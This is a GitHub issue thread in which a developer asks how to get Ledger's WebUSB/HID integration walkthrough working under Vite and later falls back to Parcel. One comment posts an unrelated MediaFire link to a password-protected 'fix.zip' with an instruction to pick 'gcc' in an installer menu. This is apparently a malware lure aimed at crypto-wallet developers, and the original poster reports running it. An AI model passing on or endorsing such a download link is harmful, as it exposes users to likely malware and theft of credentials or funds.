### ISSUE TITLE
Feedback for “Web USB/HID” - working with Vite/Yarn

### ISSUE THREAD

**Issue by dotnetspec** [LedgerHQ/developer-portal#245]
I'm building an exchange web app that I want to add Ledger hardware wallet interoperability to.

I followed your [integration walk-through](https://developers.ledger.com/docs/connectivity/ledgerJS/integration-walkthrough/web-application/web-hid-usb) and it worked without issue.

My problems start with the attempt to port the walk-through into my own project.

I get multiple errors that, I believe, relate to the build process e.g.:
```
Uncaught ReferenceError: buffer is not defined
    <anonymous> http://localhost:5173/node_modules/.vite/deps/@ledgerhq_hw-transport-webusb.js?v=424e4995:1966
@ledgerhq_hw-transport-webusb.js:1966:3
```
My project uses Vite as the build tool because "while both Parcel and Vite are popular and have their strengths, Vite has seen a significant increase in popularity due to its performance benefits and modern approach." and it has resolved various issues that I have needed to overcome for other essential parts to work correctly, so I am unable to abandon it as the build tool in my project.

My understanding is that there is no reason, in principle, why Vite cannot be configured to provide a similar build to parcel. However, I have tried a lot of configurations in my vite.config.js with pollyfills, plugins and build options etc. in attempts to overcome them and, so far, have been unable to do so.

Are there any plans on Ledger's part to create a similar walk-through for a Vite/Yarn build i.e. with a recommended vite.config.js etc?
If not how can the code be ported into such (currently widely used) environments because parcel and vite cannot be used together AFAIK?

Thanks  ...

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dotnetspec** [comment]
Thanks, but that file didn't help me and I didn't get an 'installer menu' when I ran it in Wine64. 

Although my system already has a Linux version of gcc installed. Fortunately, my app retains functionality when built with Parcel, so I could remove Vite without issue (other than probably a larger dist bundle).

It was also then necessary to ensure I ran the app with the parcel localhost server.

It would still have been more straightforward to have a similar walk-through for a Vite/Yarn build i.e. with a recommended vite.config.js etc. as Vite is used in many projects now, I believe ... Perhaps this is not possible currently (?). If not I would be interested to know why ...
